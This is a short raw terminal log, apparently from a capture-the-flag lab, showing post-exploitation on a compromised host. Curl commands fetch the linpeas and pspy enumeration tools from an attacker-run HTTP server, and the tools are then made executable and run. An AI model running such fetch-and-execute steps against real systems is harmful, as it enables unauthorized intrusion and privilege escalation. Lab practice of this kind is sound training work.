













=================



pwd
/home/kid
curl -o linpeas http://10.10.14.12/linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  312k  100  312k    0     0   202k      0  0:00:01  0:00:01 --:--:--  202k
ls
html
linpeas
logs
snap
user.txt

./linpeas
/bin/sh: 70: ./linpeas: Permission denied


chmod +x linpeas
./linpeas








curl -o pspy http://10.10.14.12/pspy64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3006k  100 3006k    0     0  1000k      0  0:00:03  0:00:03 --:--:-- 1000k






hippoeug@kali:~/Documents$ sudo python -m SimpleHTTPServer 80



./pspy
sh: 27: ./pspy: Permission denied
chmod +x pspy
./pspy
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855












